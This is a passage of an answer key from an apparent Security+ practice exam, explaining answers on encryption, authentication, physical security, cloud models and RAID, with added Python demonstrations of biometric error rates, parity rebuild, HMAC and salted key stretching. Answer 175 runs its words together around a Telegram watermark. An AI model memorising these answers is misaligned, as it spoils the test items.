114. B. Gordon should implement a version numbering scheme and ensure that the proper current version of software components is included in new releases and deployments. Developers could still manually reintroduce old code, but version numbering helps to ensure that you have a current version in use. Neither continuous deployment nor continuous integration will prevent old code from being inserted, and release management may rely on version numbering but won't prevent it by itself.

115. D. Transport Layer Security (TLS) provides a reliable method of encrypting web traffic. It supports mutual authentication and is considered secure. Although Secure Sockets Layer (SSL) can encrypt web traffic, TLS was created in 1999 as its successor. Although many network administrators still use the term SSL, in most cases today what you are using is actually TLS, not the outdated SSL. PPTP and IPSec are protocols for establishing a VPN, not for encrypting web traffic.

116. A. Smart cards can support modern cryptographic algorithms, meaning that weak security due to a smart card's limitations on encryption is not a common issue. Smart card readers and maintenance do add additional expense, and user experiences are limited by the need to have the card in hand and insert it or present it to a reader either during authentication or for entire sessions. Smart cards typically have a PIN or password, meaning that they are used for multifactor, not single-factor, authentication.

117. D. Setting off an alarm so that staff become used to it being a false positive is a technique that penetration testers may use if they can gain access to a facility. Once staff are used to alarms going off and ignore it, the penetration testers can enter areas that are alarmed without a response occurring. Setting off the alarm as part of a test isn't typical for penetration testers, and disabling the alarm and waiting for the lack of an alarm to be reported is also more likely to be part of an internal test, not a penetration test. Asking staff members to open the door is not a means of making alarms less effective, and staff members who know the door is alarmed are unlikely to do so.

118. C. The term "XaaS" refers to anything as a service, a broad reference to the huge number of options that exist for services via third-party providers. The rest of the options for this question were made up for the question.

119. D. Signage plays multiple roles in secure environments, including discouraging unwanted or unauthorized access, providing safety warnings, and helping with evacuation routes and other navigation information as part of a physical safety effort.

120. B. Nora has established a cold site. A cold site is a location that can be brought online but does not have systems; cold sites typically have access to power and bandwidth, but they need to be fully equipped to operate after a disaster since they are just rented space. Warm sites have some or all of the infrastructure and systems Nora needs but do not have data. A hot site is a fully functional environment with all of the hardware, software, and data needed to operate an organization. They are expensive to maintain and run but are used by organizations that cannot take the risk of downtime. A MOU is a memorandum of understanding and is not a type of disaster recovery site.

121. A. Windows calls the point that it saves to return to a known good configuration a system restore point. Matt should set one prior to installing new software or patching if he is worried about what might occur. The rest of the options are not Windows terms.

122. A. TOTP, or time-based one-time password, algorithms rely on the time being accurate between both of the authentication hosts. That means that if a system or device is not properly synced to an authoritative and correct time server, or if its local system time has drifted, the authentication may fail. Although TOTP systems have some flexibility, a clock that is sufficiently incorrect will cause an issue. HMAC-based one-time password (HOTP) and short message service (SMS)-based multifactor systems do not suffer from this issue, and MMAC was made up for this question.

123. C. Object detection capabilities can detect specific types or classes of objects and can be used to determine if the object is moved. In this case, Nina could enable object detection to notify her when packages are delivered, and she may be able to specifically select an object to monitor for additional security. Infrared capabilities are useful in low-light situations, motion detection helps to preserve storage space by only recording when motion occurs, and facial recognition could help identify specific individuals but won't help with packages.

124. C. Although user health data is a concern for the wearer of the device, unless the device is required by the organization, the user's health data is typically not an organizational security concern. GPS location data, data exposure from data that is copied to or accessible from the device, and the potential for devices to act as unsecured wireless gateways to the organization's network are all common security concerns for wearables. Lack of patching, lack of device encryption, and the inability to enforce compliance or security policies are also common concerns for wearables.

125. D. A Faraday cage is a metal wire mesh designed to block electromagnetic interference (EMI). None of the other answers describe what a Faraday cage is used for or capable of.

126. B. Smart cards paired with electronic locks can be used to allow entrance into a building. The smart card system can also store information about the user, and thus the system can log who enters the building. A security guard with a sign-in sheet would function, but there are many ways to subvert a sign-in sheet, and a guard can be distracted or become inattentive. This makes smart card access a better solution. Guards are also more expensive over time. A camera would record who enters but would not control access. A nonemployee could enter the building. An uncontrolled/supervised sign-in sheet would not be secure.

127. D. Although electronic locks offer a number of advantages, including the ability to provide different codes or access to different users and the ability to deprovision access, they also require power, whether in the form of a battery or constantly provided power from a power source. That means that power loss can cause issues, either due to the lock remaining locked or defaulting to an open state.

128. A. Managing her organization's IP address schema and usage will allow Kara to identify unknown and potentially rogue devices. IP addresses are not used to secure encryption keys, and managing a schema will not help prevent denial-of-service attacks. Keeping track of what IP addresses are in use can help avoid IP address exhaustion, but this does not provide a direct security advantage.

129. C. Of the locks listed here, deadbolts are the most secure. The locking bolt goes into the door frame, making it more secure. Whether a lock uses a key or combination does not change how secure it is. Key-in-knob locks are very common and generally provide less resistance to bypass than a deadbolt-based solution. Finally, padlocks can be cut off with common bolt cutters.

130. B. NIC teaming can provide greater throughput by sending traffic through multiple network interface cards (NICs) while also ensuring that loss of a card will not cause an outage, thus providing fault tolerance.

131. A. False acceptance rate (FAR) is the rate at which the system incorrectly allows in someone it should not. This is clearly a significant concern. Any error is a concern, but the false rejection rate is less troublesome than the false acceptance rate. The cross-over error rate (CER) is when the FAR and the false rejection rate (FRR) become equal. This indicates a consistent operation of the biometric system. The equal error rate is another name for cross-over error rate.
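Answers 103 and 131 both turn on how FAR, FRR and the crossover error rate relate. The following added Python example (not from the book) computes FAR and FRR for two constructed biometric matchers at every decision threshold, locates each system's CER, and ranks the systems by it, so the trade-off between the two error types and the comparison by CER are both visible. The match scores are constructed sample data, not measurements from any real system.

```python
# Constructed matcher scores (0-100): higher means "looks more like the enrolled user".
GENUINE_A = [55, 60, 65, 70, 75, 80, 85, 90, 95, 65]   # legitimate users, system A
IMPOSTOR_A = [20, 25, 30, 35, 40, 45, 50, 55, 60, 35]  # impostors, system A
GENUINE_B = [40, 50, 55, 60, 65, 70, 75, 80, 85, 60]   # system B: more overlap
IMPOSTOR_B = [20, 30, 40, 45, 50, 55, 60, 65, 70, 45]
THRESHOLDS = range(0, 101, 5)


def error_rates(genuine, impostor, threshold):
    """FAR: impostors scored at/above threshold (wrongly admitted).
    FRR: genuine users scored below threshold (wrongly rejected)."""
    far = sum(s >= threshold for s in impostor) / len(impostor)
    frr = sum(s < threshold for s in genuine) / len(genuine)
    return far, frr


def sweep(genuine, impostor, thresholds=THRESHOLDS):
    """(threshold, FAR, FRR) for every threshold: raising the threshold lowers FAR,
    the more dangerous error, at the cost of a higher FRR."""
    return [(t, *error_rates(genuine, impostor, t)) for t in thresholds]


def crossover_error_rate(genuine, impostor, thresholds=THRESHOLDS):
    """Sweep the threshold; the CER is the error rate where FAR and FRR meet."""
    best_gap, best_threshold, best_rate = None, None, None
    for t in thresholds:
        far, frr = error_rates(genuine, impostor, t)
        gap = abs(far - frr)
        if best_gap is None or gap < best_gap:
            best_gap, best_threshold, best_rate = gap, t, (far + frr) / 2
    return best_threshold, best_rate


def rank_systems(**systems):
    """Lower CER is better: return the system names ordered best first."""
    return sorted(systems, key=lambda name: crossover_error_rate(*systems[name])[1])


if __name__ == "__main__":
    for name, (g, i) in {"A": (GENUINE_A, IMPOSTOR_A), "B": (GENUINE_B, IMPOSTOR_B)}.items():
        for t, far, frr in sweep(g, i):
            print(f"system {name} threshold {t:3d}: FAR {far:.2f} FRR {frr:.2f}")
        print(f"system {name} CER: threshold/rate = {crossover_error_rate(g, i)}")
    print("best first:", rank_systems(A=(GENUINE_A, IMPOSTOR_A), B=(GENUINE_B, IMPOSTOR_B)))
```

On this data system A crosses over at a rate of 0.1 and system B at 0.3, so A is the better matcher even though either could be tuned to a low FAR by raising its threshold and accepting more false rejections.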

132. C. Data sovereignty refers to the concept that data that is collected and stored in a country is subject to that country's laws. This can be a complex issue with multinational cloud services and providers that may store data in multiple countries as part of their normal architecture. It may also create compliance and other challenges based on differences in national laws regarding data, data privacy, and similar issues.

133. A. Low-power devices typically have limited processor speed, memory, and storage, meaning that encryption can be a challenge. Fortunately, solutions exist that implement low-power cryptographic processing capabilities, and continued advances in processor design continue to make lower-power processors faster and more efficient. Legal limitations do not typically take into account whether a device is a low-power device, and public key encryption can be implemented on a wide range of CPUs and embedded systems, so factoring prime numbers is unlikely to be an issue.

134. A. A secure cabinet or safe is tamper-proof and provides a good place to store anything you are trying to physically protect. Encrypting thumb drives would require you to store the key used to encrypt the thumb drive, thus continuing the problem. It is actually a good practice to store BitLocker keys on removable media, provided that media is safeguarded. In most cases, desk drawers are not secure and can easily be broken into, even if they are locked.

135. D. RAID 6, disk striping with dual parity, uses a minimum of four disks with distributed parity bits. RAID 6 can handle up to two disks failing. RAID 3 is byte-level striping with dedicated parity and cannot tolerate more than a single drive failing. RAID 0 is disk striping, which cannot handle disk failure, and RAID 5, disk striping with distributed parity, can handle only one disk failing.
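Why single parity survives one failure but not two, which is the distinction answer 135 rests on, can be shown with a few lines of XOR arithmetic. The added Python example below (not from the book) builds the RAID 5 style parity block for a constructed three-block stripe, rebuilds the stripe after one block is lost, and refuses when two are lost, because one parity equation cannot determine two unknown blocks; RAID 6 covers that case by adding an independent second parity, which this example does not implement.

```python
def xor_blocks(blocks):
    """XOR equal-length byte blocks together; over the data blocks this is the parity block."""
    result = bytearray(len(blocks[0]))
    for block in blocks:
        for i, b in enumerate(block):
            result[i] ^= b
    return bytes(result)


def rebuild_stripe(data_blocks, failed):
    """Rebuild a stripe protected by one XOR parity block (RAID 5 style).

    One failed disk: the missing block is parity XOR all surviving data blocks.
    Two failed disks: a single parity block is one equation in two unknowns, so the
    data is unrecoverable and None is returned. RAID 6's second parity closes that gap.
    """
    parity = xor_blocks(data_blocks)  # computed when the stripe was originally written
    if not failed:
        return list(data_blocks)
    if len(failed) > 1:
        return None
    survivors = [b for i, b in enumerate(data_blocks) if i != failed[0]]
    rebuilt = list(data_blocks)
    rebuilt[failed[0]] = xor_blocks(survivors + [parity])
    return rebuilt


# Constructed stripe: one block per data disk of a four-disk RAID 5 set (3 data + 1 parity).
STRIPE = [b"block-on-d0", b"block-on-d1", b"block-on-d2"]


if __name__ == "__main__":
    print("parity:", xor_blocks(STRIPE).hex())
    print("after losing disk 1:", rebuild_stripe(STRIPE, [1]))
    print("after losing disks 0 and 2:", rebuild_stripe(STRIPE, [0, 2]))
```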

136. C. The ability to record is not included in many traditional closed-circuit television (CCTV) monitoring systems and is a key element of investigations of theft and other issues. Motion activation and facial recognition are typically associated with computer-based camera systems but do not directly address the concern Maria is working to handle. Infrared cameras would be more useful in spaces where lights were not always in use, such as outdoors or in facilities that are not occupied at night.

137. C. Static codes are typically recorded in a secure location, but if they are not properly secured, or are otherwise exposed, they can be stolen. Brute-force attempts should be detected and prevented by back-off algorithms and other techniques that prevent attacks against multifactor authentication systems. Collisions exist with hashing algorithms, not with static multifactor codes, and clock mismatch issues occur for time-based one-time password (TOTP) codes.

138. B. A symmetric cryptosystem will typically perform faster and with less processor overhead, and thus lower latency, than asymmetric cryptosystems. Hashing is not encryption, and one-time pads are not implemented in modern cryptosystems, although they may have uses in future quantum cryptographic solutions.

139. A. Industrial camouflage efforts minimize how noticeable a facility is, helping it to remain unnoticed by casual observers. Although industrial camouflage can be useful, it is rarely effective against determined adversaries. A demilitarized zone (DMZ) in information security terms is a network segment that is intentionally exposed to the public with appropriate security protecting it, while stronger security is applied to nonpublic resources. Disruptive coloration is a camouflage technique but not one used in information security. Industrial obfuscation was made up for this question.

140. A. Asymmetric cryptography has a relatively high computational overhead, making symmetric key encryption faster. That means that once you can exchange an ephemeral symmetric key, or a series of keys, you can encrypt and send data more quickly and efficiently using symmetric encryption. There is no key length limitation, and reasonable lifespans are met with either technology. Key reuse is not an issue with a public key encryption scheme.

141. D. Failure to release memory you have allocated can lead to a memory leak. Therefore, if you are using a programming language like C++ that allows you to allocate memory, make certain you deallocate that memory as soon as you are finished using it. Allocating only the variable size needed and declaring variables where needed are good programming practices. However, failure to follow them just leads to wasteful use of memory; it does not lead to a security problem like a memory leak. Although this is a good idea to prevent buffer overflows, it is not a memory management issue.

142. B. Using a longer key is the best way to make it less likely that an encrypted file will be cracked. This does not prevent issues with the algorithm itself, but if a vulnerability is not found in an algorithm, adding key length will help ensure that even significant increases in computational power will not result in the encryption being cracked in a reasonable period of time. Quantum computing has the potential to change this, but practical quantum encryption cracking tools are not known to be available yet. There is no such thing as an anti-quantum cipher, and a rotating symmetric key might be used to ensure that a key could not be cracked but does not provide longevity. Instead, it is used to allow ephemeral communications to be less likely to be cracked on an ongoing basis.

143. C. The best answer from this list is DLP, or data loss prevention technology. DLP is designed to protect data from being exposed or leaking from a network using a variety of techniques and technology. Stateful firewalls are used to control which traffic is sent to or from a system, but will not detect sensitive data. OEM is an original equipment manufacturer, and security information and event management (SIEM) can help track events and incidents but will not directly protect data itself.

144. C. Encryption keys used for quantum key distribution are sent in the form of qubits. The polarization state of the qubits reflects the bit values of the key. Once sent, the receiver can validate the state of some of those qubits to ensure both sender and receiver have the same key. Bytes and bits are used in traditional data exchanges, and nuquants were made up for this question.

145. B. Two-person control schemes require two individuals to be involved to perform an action. This means that Alicia can implement a two-person control scheme knowing that both individuals would have to be involved to subvert the control process. Biometrics will merely validate that a person is who they say they are, robotic sentries do not add any particular value to this scenario, and a demilitarized zone (DMZ) is used to keep front-facing systems in a zone that can be controlled and secured.

146. A. Social login is an example of a federated approach to using identities. The combination of identity providers and service providers, along with authorization management, is a key part of federation. AAA is authentication, authorization, and accounting and is typically associated with protocols like RADIUS. Privilege creep occurs as staff members change jobs and their privileges are not adjusted to only match their current role. IAM is a broader set of identity and access management practices. Although IAM may be involved in federated identity, this question does not directly describe IAM.

147. A. USB data blockers are used to ensure that cables can only be used for charging, and not for data transfer. None of the other answers to this question are used for this purpose, and in fact all were made up—USB is a serial bus, circuit breakers are used for power, and HMAC-based one-time password (HOTP) is a type of multifactor token algorithm.

148. B. In the platform-as-a-service (PaaS) model, the consumer has access to the infrastructure to create applications and host them. Software-as-a-service (SaaS) supplies a particular application; infrastructure-as-a-service (IaaS) does not directly provide the ability to create applications, although this distinction is quickly blurring; and IDaaS is identity-as-a-service.

149. B. Avoiding reuse of the key components of an encryption process means that even if a malicious actor managed to break the encryption for a message or exchange, the next new initialization vector (IV) and key would require an entirely new brute-force attack. Using a new IV and key does not make brute-force attacks impossible, nor does it make brute force easier. A single successful attack would expose a single message, or however much data was encrypted using that IV and key.

150. C. The Linux kernel uses user-driven events like keystrokes, mouse movement, and similar events to generate randomness (entropy). The time of day is not random, user logins are typically not frequent enough or random enough to be a useful source of entropy, and network packet timing is not used for this. If you encounter a question like this and don't know where to start, consider what you know about entropy—it is randomness, so you would be looking for the input that would have the most randomness to it. Thus, you could rule out the time of day, and likely user logins. After that, you might consider what could be controlled by an external party: network packets being sent to the system, and rule that out as a potential attack vector. That leaves keyboard input and mouse movement.

151. C. Elliptic curve encryption schemes allow the use of a shorter key for the same strength that an RSA key would require, reducing the computational overhead required to encrypt and decrypt data. That doesn't mean you should use a short key; instead, you must select a key length that matches your requirements for resistance to brute force and other attacks. Hashing is nonreversible and is not a form of encryption.

152. C. Lighting serves as a deterrent control, making potential malicious actors feel like they may be observed without dark areas or shadows to hide in. It does not detect actions, it does not compensate for the lack of another control, and although some lights may turn on for motion, the primary purpose is to deter malicious or unwanted actions.

153. C. Edge computing places both data storage and computational power closer to where it is needed to save on bandwidth and to improve the response of associated applications and services. Hybrid computing combines local and cloud computing. Local cloud builds cloud infrastructure on local systems. Mist computing was made up for this question but may sound similar to fog computing, a term that has a similar meaning to edge computing, which uses local computation and storage that is then Internet connected.

154. D. Ben has deployed a tokenization scheme. Encryption would require the data to be decrypted to be used, and this is not mentioned. Hashing could be used to conceal values but does not preserve the ability to work with the data. Masking modifies content to conceal personally identifiable information or other sensitive information.

155. D. Fencing is both a useful deterrent, because it discourages malicious actors from accessing the grounds that Dana wants to protect, and an example of a physical control. A visitor log is an administrative control and will not deter malicious actors. Motion detectors and cameras are examples of detective controls.

156. A. Adding a digital signature can ensure both that the message has not been changed, and thus that its integrity is intact, and that it supports nonrepudiation by proving that the message is from the sender who claims to have sent it.

157. B. Attestation processes request responsible managers or others to validate that user entitlements or privileges are correct and match those that the user should have. Attestation is not an employment verification process, although managers may discover that users who have left the organization still have rights as part of an attestation process. It does not require proof of identity or validation of security controls.

158. B. A generator is the most appropriate answer to a multihour outage. Although a hot site would allow her organization to stay online, the cost of a hot site is much higher than that of a generator. A PDU, or power distribution unit, is used to manage and distribute power, not to handle power outages. Finally, UPS systems are not typically designed to handle long outages. Instead, they condition power and ensure that systems remain online long enough for a generator to take over providing power.

159. A. A MAC supports authentication and integrity and is used to confirm that messages came from the sender who is claimed to have sent it and also ensures that recipients can validate the integrity of the message. It does not help with confidentiality.
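An added Python example (not from the book) of the three properties answer 159 assigns to a MAC: an HMAC-SHA256 tag over a message verifies for the genuine message, fails for a modified message, and fails for a tag produced under a different key, while the message bytes themselves remain readable to anyone on the path. The shared key and the sample message are constructed for the demonstration. Because both sender and recipient hold the same key, either of them could have produced the tag; that is why a MAC gives origin and integrity but not the nonrepudiation that a digital signature provides.

```python
import hashlib
import hmac
import secrets


def tag_message(key: bytes, message: bytes) -> bytes:
    """HMAC-SHA256 over the message: only a holder of `key` can produce a matching tag."""
    return hmac.new(key, message, hashlib.sha256).digest()


def open_message(key: bytes, message: bytes, tag: bytes):
    """Return the message if its tag verifies under `key`, otherwise None.

    The message travels as plaintext; the MAC adds integrity and origin checking,
    not confidentiality. compare_digest keeps the check constant-time.
    """
    if hmac.compare_digest(tag_message(key, message), tag):
        return message
    return None


def demo() -> dict:
    shared_key = secrets.token_bytes(32)        # constructed: agreed between sender and recipient
    message = b"transfer 100 to account 42"      # constructed sample message
    tag = tag_message(shared_key, message)

    return {
        # Genuine message and tag: accepted.
        "genuine": open_message(shared_key, message, tag) == message,
        # Message changed in transit, old tag kept: rejected.
        "tampered": open_message(shared_key, b"transfer 900 to account 42", tag) is None,
        # Tag from someone without the shared key: rejected.
        "wrong_key": open_message(secrets.token_bytes(32), message, tag) is None,
        # Nothing is hidden: the account number is visible in the transmitted bytes.
        "plaintext_visible": b"account 42" in message,
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```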

160. C. Inert gas systems are used to reduce the oxygen in a room without the hazard to staff that carbon dioxide systems pose. Both dry-pipe and pre-charge systems use water, which can harm delicate electronics.

161. C. Proximity card readers usually work using RFID (radio frequency ID) technology. This allows cards to be used in proximity but without requiring a direct reader like a magnetic stripe. Neither biometrics nor infrared is used for proximity card readers.

162. A. Digital signatures that use a sender's private key provide nonrepudiation by allowing a sender to prove that they sent a message. Unless the sender's private key has been compromised, signing a message with their private key and allowing the recipient to validate the signature using their public key ensures that the sender sent the message in question. Longer keys don't prove who a sender is, hashes are not reversible, and the public key in use is the sender's, not the recipient's.

163. B. Natural disasters, as well as man-made disasters, are primary considerations for geographic security considerations. Placing backup sites outside of the likely path or range of a single disaster helps ensure continuity of operations for organizations. MTR is the maximum time to restore, sprawl avoidance is usually considered for virtual machines, and service integration is a consideration for service architectures, not geographical placement.

164. B. Although actual threats from drones and unmanned aerial vehicles (UAVs) are relatively rare for most organizations, placing sensitive areas further inside a building will deter most current generations of drones from entering or recording them. Security doors and other common obstacles will prevent most UAV or drone penetration that typical organizations will face. Fences are easily bypassed by flying drones, biometric sensors won't stop a drone from hovering outside of a window, and Faraday cages might stop a drone from receiving commands if you could get the drone inside first!

165. D. The key trade-off when considering resource constraints for encryption is that stronger encryption with longer keys requires more computational time and resources. This means that it will be slower and will consume more of the capacity of a system. A balance between security and computational overhead needs to be struck that matches the confidentiality needs of the data that is being handled or sent. Stronger encryption is usually slower, running out of entropy in the scenario described is not a typical concern, and stronger encryption taking up significant amounts of drive space is also not a real issue in this scenario.

166. C. Encrypting the message will ensure that it remains confidential as long as only the recipient is able to decrypt it. Hashing the message will result in the message not being recoverable, whereas digitally signing it can provide nonrepudiation. Finally, quantum encryption algorithms and the systems required to use them are not available today, meaning Amanda won't be able to use them—yet!

167. C. In most cases, the major cloud service providers have more security staff and a greater budget for security operations. This means they can invest more in security controls, staffing, monitoring, and other activities. Using a cloud service provider can help improve the overall security posture of an organization that might not have the ability to have full-time or dedicated security staff or expertise. At the same time, local staff will understand the business better and will usually have a faster response time to critical business needs.

168. D. Network load balancers distribute traffic among systems, allowing systems to be added or removed, and making patching and upgrades easier by draining connections from systems and removing them from the pool when work needs to be done on them. They can also help monitor systems for performance, report on issues, and ensure that loads match the capabilities of the systems that they are in front of. Firewalls are used for security, switches are a network device used to transfer traffic to the correct system, and a horizontal scaler was made up for this question.

169. D. Protected cable distribution uses such controls as electrical, electromagnetic, and even acoustic or air pressure sensors to ensure that cables and distribution infrastructure are not accessed, allowing sensitive information to be transmitted in unencrypted form. The U.S. government identifies three options: hardened carrier, alarmed carrier, and continuously viewed protected distribution systems. Shielded cables are used to prevent EMI.

170. B. Maureen is using the concept of audio steganography by hiding data inside an audio file in a way that conceals it from detection. The other options are made up for this question.

171. B. Since Nicole is specifically worried about SMS pushes to cell phones, the most likely attack model is SIM (subscriber identity module) cloning, allowing attackers to obtain the authentication codes sent to legitimate users. Attacks on a Voice over Internet Protocol (VoIP) system would typically help intercept SMS if it was sent to VoIP phones, not cell phones (although forwarding is possible, but not mentioned here). Brute-force attacks are unlikely to succeed against SMS phone factors, and rainbow tables are used to crack hashed passwords.

172. C. Encryption is often used to protect data at rest. When data needs to be accessed, it can be decrypted. Hashing is not reversible, meaning that it is not used for data storage when the original form is needed for processing. Comparing hashed passwords works because the password is presented again, rather than the password needing to be retrieved from storage. TLS is used to protect data in motion, and tokenization is a data security technique that replaces sensitive data elements with nonsensitive elements that can still be processed in useful ways.

173. B. Nathaniel has created an air gap, a physical separation that will require manual transport of files, patches, and other data between the two environments. This helps to ensure that attackers cannot access critical systems and that insiders cannot export data from the environment easily. A demilitarized zone (DMZ) is a separate network segment or zone that is exposed to the outside world or other lower trust area. A vault is a secured space or room, but vaulting is not a term used on the Security+ exam, and a hot aisle is the aisle where servers exhaust warm air.

174. A. Masking modifies content to conceal personally identifiable information (PII) or other sensitive information. Tokenization replaces sensitive information with a nonsensitive alternative that allows the data to still be processed in useful ways. Encryption would require the data to be decrypted to be used, and this is not mentioned. Hashing could be used to conceal values but does not preserve the ability to work with the data.

175. C. On-premisescloudcomputingisoftencalledprivatecloud.Notallprivatecloudshavetobeon-site,becauseprivatecloudscouldbedeployedtoaremotelocationlikeathird-partyhostingfacility.Infrastructureasa

Telegram Channel @nettrain

serviceandplatformasaservicerefertothird-partyhostingservices,andhybridcloudcombinesbothon-premisesandcloudcomputingmodels.

176. C. The most likely threat to physical tokens is theft or loss resulting in access to the token. Cloning tokens might be possible if the token's seed were known, but they are designed to prevent this from being reverse-engineered, meaning a significant breach of the vendor or similar issue would be required to cause an exposure. Brute force is not a realistic threat against most token implementations, nor is algorithm failure.

177. D. Control diversity means utilizing different controls to mitigate the same threat. For malware, the use of technical controls, such as antimalware, is critical. But it is also important to have administrative controls, such as good policies, and to ensure that employees are properly trained. Thus, for this question a combination of policies, training, and tools is the best answer.

178. A. Although it may seem like Charles has presented two factors, in fact he has only presented two types of things he knows along with his identity. To truly implement a multifactor environment, he should use more than one of something you have, something you know, and something you are.

179. C. Salt reuse is a critical mistake, because it would allow a rainbow table to be generated using that salt. Although standard rainbow tables would not work, a reused salt would only require the creation of a single new rainbow table. Alphanumeric salts are not a problem, long salts are not a problem, and this salt is a reasonable length at 16 characters using hexadecimal.

180. B. Alaina's need for a local, secure storage area is an ideal situation for the use of a vault or safe where the keys can be stored on a device like a thumb drive. Simply placing them on a drive leaves them vulnerable to theft, and an air-gapped system would also be potentially exposed to theft or local breaches.

181. B. It is critical to authenticate API users and then to authorize them to take actions. If you authorized first and then authenticated, users could take action before you knew who they were! Encrypting throughout the use of the API keeps data and queries secure, validating input and filtering out dangerous strings is important to prevent injection and other attacks, and auditing and logging allows you to troubleshoot and respond to issues and attacks.

182. C. Frank has used a degausser to erase the data on the tapes. Degaussing only works on magnetic media like tapes and will not work on optical or flash media. Burning media or materials is exactly what it sounds like—putting them into a fire! Shredding and pulping are mechanical means of destruction.

183. A. 5G requires higher antenna density for full bandwidth communication than previous technologies, meaning that Angela's organization will have to carefully consider antenna placement, particularly inside buildings where structural elements can create challenges with signal propagation. 5G is usable indoors, is commercially available, and can coexist with traditional Wi-Fi, so Angela should not include those in her list of concerns.

184. A. Chris is concerned about privilege creep, the slow accumulation of privileges over time as staff members change roles and their privileges are not removed or updated. Privilege management processes would help to prevent this, thus keeping data more secure. Of the other options, only privilege escalation is a common term, and it means gaining additional privileges, typically as part of an attack from an account with fewer privileges to a more privileged account like an administrator or root account.

185. C. Honeyfiles are files that are intended to help detect attackers. They are placed in a location where accessing them can be detected but are not set up to allow users to access them. That means that attackers who access the seemingly desirable file can be easily detected and appropriate alerts can be sent.

186. C. Although there is no specific recommended distance, recommendations typically range from 60 to 120 miles away to ensure that a single disaster is unlikely to disable both locations.

187. B. Fog computing is a term coined by Cisco to describe cloud computing at the edge of an enterprise network. The more common term for this is edge computing, but you may encounter both terms. Fog implementations handle significant amounts of computation, communication, and storage activities locally, while also connecting to cloud services to perform some of the work.

188. A. Bcrypt, scrypt, and PBKDF2 are all examples of key stretching algorithms. MD5 and SHA1 are both hashing algorithms, and ncrypt was made up for this question.
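The following Python is an added example, not code from the book, tying answers 179 and 188 together: passwords are stretched with PBKDF2-HMAC-SHA256 (one of the key stretching functions named in answer 188), and the same storage routine is run once with a fresh random salt per account and once with a single reused salt, so the effect described in answer 179 can be measured. The usernames, passwords, candidate list and fixed demo salt are all constructed for the demonstration.

```python
"""Per-account salts with a key-stretching KDF (added example, not from the book)."""
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

# PBKDF2-HMAC-SHA256 iteration count; kept small so the demo runs quickly.
# Production deployments use a far higher count.
ITERATIONS = 20_000


def derive(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """Key-stretch a password with PBKDF2-HMAC-SHA256 under the given salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def hash_password(password: str, salt: Optional[bytes] = None) -> Dict[str, bytes]:
    """Produce a storable record {salt, hash}.

    With salt=None a fresh 16-byte random salt is drawn per record, which is
    the correct behaviour. Passing a fixed salt reproduces the salt-reuse
    mistake from answer 179 and exists here only for the comparison below.
    """
    if salt is None:
        salt = os.urandom(16)  # 16 random bytes, unique to this record
    return {"salt": salt, "hash": derive(password, salt)}


def verify_password(password: str, record: Dict[str, bytes]) -> bool:
    """Re-derive with the stored salt and compare in constant time."""
    candidate = derive(password, record["salt"])
    return hmac.compare_digest(candidate, record["hash"])


def build_table(candidates: List[str], salt: bytes) -> Dict[bytes, str]:
    """Precompute hash -> candidate password under ONE salt.

    This is the single new table answer 179 warns about: the work is only
    worth doing because every stored record shares that salt.
    """
    return {derive(pw, salt): pw for pw in candidates}


def accounts_exposed(records: Dict[str, Dict[str, bytes]],
                     table: Dict[bytes, str]) -> List[str]:
    """Names of records whose stored hash appears directly in the table."""
    return [user for user, rec in records.items() if rec["hash"] in table]


# Constructed demo data: three accounts, two of which share a weak password.
DEMO_USERS = {"alice": "winter2021", "bob": "winter2021", "carol": "s3cr3t!"}
CANDIDATES = ["winter2021", "password", "letmein"]
# A constructed 16-byte salt, reused across records to model the mistake.
SHARED_SALT = bytes.fromhex("0123456789abcdef0123456789abcdef")


def demo_salt_reuse() -> Tuple[int, int]:
    """Return (accounts exposed with a reused salt, accounts exposed with unique salts)."""
    reused = {u: hash_password(p, SHARED_SALT) for u, p in DEMO_USERS.items()}
    unique = {u: hash_password(p) for u, p in DEMO_USERS.items()}
    table = build_table(CANDIDATES, SHARED_SALT)
    return len(accounts_exposed(reused, table)), len(accounts_exposed(unique, table))


if __name__ == "__main__":
    print(demo_salt_reuse())  # (2, 0)
```

With the reused salt both accounts sharing "winter2021" also store byte-identical hashes, which is itself a sign worth alerting on when auditing a credential store.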

189. C. The only directory service listed is Lightweight Directory Access Protocol (LDAP). SAML is Security Assertion Markup Language, OAuth is an authorization delegation protocol, and 802.1x is a network authentication protocol.


Chapter 3: Implementation

1. A. Dual control, which requires two individuals to perform a function; split knowledge, which splits the passphrase or key between two or more people; and separation of duties, which ensures that a single individual does not control or oversee the entire process all help prevent insider threats when managing a PKI. Requiring a new passphrase when a certificate is used is not a reasonable solution and would require reissuing the certificate.

2. B. A site survey is the process of identifying where access points should be located for best coverage and identifying existing sources of RF interference, including preexisting wireless networks and other devices that may use the same radio frequency spectrum. By conducting a site survey, Naomi can guide the placement of her access points as well as create a channel design that will work best for her organization.

3. B. The option that best meets the needs described above is PEAP, the Protected Extensible Authentication Protocol. PEAP relies on server-side certificates and relies on tunneling to ensure communications security. EAP-MD5 is not recommended for wireless networks and does not support mutual authentication of the wireless client and network. LEAP, the Lightweight Extensible Authentication Protocol, uses WEP keys for its encryption and is not recommended due to security issues. Finally, EAP-TLS, or EAP Transport Layer Security, requires certificates on both the client and server, consuming more management overhead.

4. C. East-west traffic is traffic sent laterally inside a network. Some networks focus security tools at the edges or places where networks interconnect, leaving internal, or east-west, traffic open. In zero-trust environments, internal traffic is not presumed to be trustworthy, reducing the risks of this type of lateral communication. Side-stepping, slider traffic, and peer interconnect were all made up for this question, although peer interconnect may sound similar to peer-to-peer traffic, which may be lateral in many networks.

5. C. Although preventing Multipurpose Internet Mail Extensions (MIME) sniffing may sound humorous, MIME sniffing can be used in cross-site scripting attacks, and the X-Content-Type-Options header helps prevent MIME sniffing. HTTP security-oriented headers can also set X-Frame options, turn on cross-site scripting protection, set content security policies, and require transport security. There isn't a "Disable SQL injection" header, however!

6. C. Mobile device management (MDM) suites often provide the ability to manage content on devices as well as applications. Using content management tools can allow Charlene to provision files, documents, and media to the devices that staff members in her organization are issued. Application management would be useful for apps. Remote wipe can remove data and applications from the device if it is lost or stolen, or an employee leaves the organization. Push notifications are useful when information needs to be provided to the device user.

